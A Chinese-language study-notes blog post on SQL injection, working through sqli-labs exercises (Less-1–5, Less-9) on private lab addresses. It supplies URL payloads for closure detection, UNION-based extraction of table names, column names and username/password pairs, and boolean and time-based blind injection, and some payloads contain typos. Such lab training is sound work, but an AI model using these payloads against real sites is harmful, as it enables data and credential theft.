Sql注入基础

sql注入前置理解

bash 复制代码
在这里插入代码片select * from users where id = $id ---- 数字型注入----select * from users where id = 1 or 1=1---搞定

select * from users where id = 'id' ---- 字符型注入----select * from users where id = '1 or 1=1'---可以,一个整体都是id的值,有warning是它的容错,所以需要闭合标点符号 

mysql的注释是--空格或者#号

get传参存在url编码,防止空格被编码,+会被注释为空格,所以--+

闭合符有(),',",(())等

Less-1:

1.sql注入类型。先当作数字型处理,出不来数据,and起作用了。如果能出来数据,闭合符里面为---1 and 1=2---,说明是字符型

复制代码
MariaDB [security]> select * from security.users where id =1 and 1=2 --+;
http://172.25.254.184/sqli/Less-1/?id=1 and 1=2 --+

2.判断闭合符。用and的逻辑判断闭合符,所以闭合符为'

复制代码
MariaDB [security]> select * from security.users where id ='1' and 1=2 --+';
http://172.25.254.184/sqli/Less-1/?id=1' and 1=2 --+

3.查询查询的列数(order by | group by),用union实现联合注入。判断是3列

复制代码
http://172.25.254.184/sqli/Less-1/?id=1' order by 4 --+

4.判断回显的位置。在2和3的位置,再这里写sql语句

复制代码
http://172.25.254.184/sqli/Less-1/?id=-1' union select 1,2,3 --+

5.获取表名

复制代码
MariaDB [information_schema]> select group_concat(table_name) from information_schema.tables where table_schema='security';
http://172.25.254.184/sqli/Less-1/?id=-1' union select 1,(select database()),group_concat(table_name) from information_schema.tables where table_schema='security' --+

6.获取列名---列出所有用group_concat或者limit

复制代码
MariaDB [security]> select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users';
http://172.25.254.184/sqli/Less-1/?id=-1' union select 1,(select database()),group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'; --+

7.查数据

复制代码
MariaDB [security]> select group_concat(username,'~',password) from security.users;
http://172.25.254.184/sqli/Less-1/?id=-1' union select 1,(select database()),group_concat(username,'~',password) from security.users --+

8.截取

复制代码
MariaDB [security]> select substr(group_concat(username,'~',password),1,32) from security.users;
http://172.25.254.184/sqli/Less-1/?id=-1' union select 1,(select database()),substr(group_concat(username,'~',password),1,32) from security.users --+

Less-2

第一步:判断--是数字型

复制代码
http://172.25.254.1/sqli/Less-2/?id=1 and 1=2 --+

第二步:判断--列数---3列数据

复制代码
http://172.25.254.1/sqli/Less-2/?id=1 order by 4 --+

第三步:判断回显位置---在2,3的位置

复制代码
http://172.25.254.1/sqli/Less-2/?id=-1 union select 1,2,3 --+

Less-3

第一步:判断--是字符型

复制代码
http://172.25.254.1/sqli/Less-3/?id=1 and 1=2 --+

第二步:判断闭合符---')

复制代码
http://172.25.254.1/sqli/Less-3/?id=1') and 1=2 --+

第三步:判断列数--四列

复制代码
http://172.25.254.184/sqli/Less-3/?id=1') order by 4 --+

第四步:判断回显位置

复制代码
http://172.25.254.184/sqli/Less-3/?id=-1') union select 1,2,3 --+

Less-4--")

第一步:判断--是字符型

复制代码
http://172.25.254.1/sqli/Less-4/?id=1 and 1=2 --+

第二步:判断闭合符---")

复制代码
http://172.25.254.184/sqli/Less-4/?id=1") and 1=2 --+

第三步:判断列数--四列

复制代码
http://172.25.254.184/sqli/Less-4/?id=1") order by 4 --+

第四步:判断回显位置

复制代码
http://172.25.254.184/sqli/Less-4/?id=-1") union select 1,2,3 --+

Less-5--布尔盲注--只有true和false

复制代码
http://172.25.254.1/sqli/Less-5/?id=1 and length(database())=8 --+

ascii加二分定位每一个字符

复制代码
http://172.25.254.1/sqli/Less-5/?id=1 and ascii(aubstr(database(),1,1)<125 --+

Less-9---时间盲注

IF(条件,成功返回,失败返回)--字符型

复制代码
http://172.25.254.1/sqli/Less-9/?id=1' sleep(3) --+

http://172.25.254.1/sqli/Less-9/?id=1' and (length(database())>3,sleep(3),0) --+

http://172.25.254.1/sqli/Less-9/?id=1' and (substr(database(),1,1)="s",sleep(3),0) --+
相关推荐
Sirens.1 小时前
MySQL表设计进阶-约束范式连接索引与事务
android·数据库·mysql
字节跳动开源3 小时前
火山引擎开源 Agent 驱动的搜索自迭代技术
数据库·开源·agent
Oo大司命oO5 小时前
藏在正则表达式里的陷阱
数据库·mysql·正则表达式
_oP_i6 小时前
mysql统计数据库使用存储大小
数据库
会编程的土豆6 小时前
MySQL 入门:库、表、行、主键是什么
linux·数据库·网络协议·http
jjjava2.06 小时前
系统日志:从入门到精通的完整指南
网络·数据库
写代码的强哥6 小时前
云原生数据库与传统数据库相比“新”在哪里
数据库·云原生·架构
智慧地球(AI·Earth)7 小时前
MAX-API v1.0.5-preview.2:安全加固、计费一致性与限流隔离
安全·max api·差额计费修复